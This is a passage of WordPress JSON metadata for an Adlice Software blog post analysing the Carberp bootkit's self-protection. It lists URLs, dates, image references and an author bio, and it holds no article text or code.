effective","datePublished":"2013-07-04T11:20:41+00:00","dateModified":"2022-12-21T10:42:20+00:00","mainEntityOfPage":{"@id":"https:\/\/www.adlice.com\/carberp-bootkit-how-self-protection-is-effective\/"},"wordCount":626,"commentCount":0,"publisher":{"@id":"https:\/\/www.adlice.com\/#organization"},"image":{"@id":"https:\/\/www.adlice.com\/carberp-bootkit-how-self-protection-is-effective\/#primaryimage"},"thumbnailUrl":"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/bootkit-923x1024-parallax.png","keywords":["analysis","bootkit","carberp","rootkit"],"articleSection":["Analysis"],"inLanguage":"es"},{"@type":"WebPage","@id":"https:\/\/www.adlice.com\/carberp-bootkit-how-self-protection-is-effective\/","url":"https:\/\/www.adlice.com\/carberp-bootkit-how-self-protection-is-effective\/","name":"Carberp bootkit Self Protection | Analysis \u2022 Adlice Software","isPartOf":{"@id":"https:\/\/www.adlice.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.adlice.com\/carberp-bootkit-how-self-protection-is-effective\/#primaryimage"},"image":{"@id":"https:\/\/www.adlice.com\/carberp-bootkit-how-self-protection-is-effective\/#primaryimage"},"thumbnailUrl":"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/bootkit-923x1024-parallax.png","datePublished":"2013-07-04T11:20:41+00:00","dateModified":"2022-12-21T10:42:20+00:00","description":"Analysis of the Carberp bootkit capabilities to hide into the system, and self protect its components with a filter driver.","breadcrumb":{"@id":"https:\/\/www.adlice.com\/carberp-bootkit-how-self-protection-is-effective\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.adlice.com\/carberp-bootkit-how-self-protection-is-effective\/"]}]},{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/www.adlice.com\/carberp-bootkit-how-self-protection-is-effective\/#primaryimage","url":"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/bootkit-923x1024-parallax.png","contentUrl":"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/bootkit-923x1024-parallax.png","width":845,"height":534},{"@type":"BreadcrumbList","@id":"https:\/\/www.adlice.com\/carberp-bootkit-how-self-protection-is-effective\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.adlice.com\/es\/"},{"@type":"ListItem","position":2,"name":"Carberp bootkit : How self-protection is effective"}]},{"@type":"WebSite","@id":"https:\/\/www.adlice.com\/#website","url":"https:\/\/www.adlice.com\/","name":"Adlice Software","description":"Anti-malware and analysis tools","publisher":{"@id":"https:\/\/www.adlice.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.adlice.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"},{"@type":"Organization","@id":"https:\/\/www.adlice.com\/#organization","name":"Adlice Software","url":"https:\/\/www.adlice.com\/","logo":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/www.adlice.com\/#\/schema\/logo\/image\/","url":"https:\/\/www.adlice.com\/wp-content\/uploads\/2020\/05\/B1rTNpTG_400x40_10.png","contentUrl":"https:\/\/www.adlice.com\/wp-content\/uploads\/2020\/05\/B1rTNpTG_400x40_10.png","width":276,"height":276,"caption":"Adlice Software"},"image":{"@id":"https:\/\/www.adlice.com\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/RogueKiller","https:\/\/x.com\/AdliceSoftware","https:\/\/fr.linkedin.com\/company\/adlice-software","https:\/\/www.youtube.com\/channel\/UC4CQ-gIZMGWxl-auf0QqYhQ"]},{"@type":"Person","@id":"https:\/\/www.adlice.com\/#\/schema\/person\/a02b30804320a4059d268dc2567a307d","name":"tigzy","image":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/www.adlice.com\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/d81e380961b1b69969fa84994ad1e4cba26afe93a49d8dd3148e9c33ffe4ccac?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/d81e380961b1b69969fa84994ad1e4cba26afe93a49d8dd3148e9c33ffe4ccac?s=96&d=mm&r=g","caption":"tigzy"},"description":"Founder and owner of Adlice Software, Tigzy started as lead developer on the popular Anti-malware called RogueKiller. Involved in all the Adlice projects as lead developer, Tigzy is also doing research and reverse engineering as well as writing blog posts.","url":"https:\/\/www.adlice.com\/es\/author\/tigzy\/"}]}},"_links":{"self":[{"href":"https:\/\/www.adlice.com\/es\/wp-json\/wp\/v2\/posts\/54","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.adlice.com\/es\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.adlice.com\/es\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.adlice.com\/es\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.adlice.com\/es\/wp-json\/wp\/v2\/comments?post=54"}],"version-history":[{"count":0,"href":"https:\/\/www.adlice.com\/es\/wp-json\/wp\/v2\/posts\/54\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.adlice.com\/es\/wp-json\/wp\/v2\/media\/57"}],"wp:attachment":[{"href":"https:\/\/www.adlice.com\/es\/wp-json\/wp\/v2\/media?parent=54"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.adlice.com\/es\/wp-json\/wp\/v2\/categories?post=54"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.adlice.com\/es\/wp-json\/wp\/v2\/tags?post=54"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}